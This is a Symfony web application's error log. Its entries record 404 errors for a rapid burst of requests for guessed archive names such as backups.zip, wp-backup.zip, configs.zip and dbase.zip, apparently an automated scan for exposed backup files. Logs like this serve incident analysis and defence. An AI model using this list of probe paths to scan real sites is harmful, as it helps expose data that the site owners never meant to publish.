[2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /old.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /old.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /html.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /html.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backups.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backups.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dbase.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dbase.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /redis.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /redis.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /back_up.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /back_up.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /application.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /application.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /archive.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /archive.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-files.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-files.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /configs.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /configs.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mirror.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mirror.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-complete.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-complete.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /postgres.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /postgres.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /portal.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /portal.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_5.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_5.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /domains.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /domains.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /microservices.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /microservices.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /elasticsearch.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /elasticsearch.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-full.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-full.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /domain.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /domain.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /photos.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /photos.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /configuration.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /configuration.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /site.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /site.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /temporary.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /temporary.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /applications.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /applications.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /json.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /json.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-2024.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-2024.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mongodb.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mongodb.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sqllite.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sqllite.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /public.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /public.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /restapi.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /restapi.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /documents.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /documents.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /videos.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /videos.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /properties.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /properties.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-20240527.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-20240527.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /gallery.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /gallery.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sites.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sites.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /content.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /content.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_1.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_1.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /neo4j.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /neo4j.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
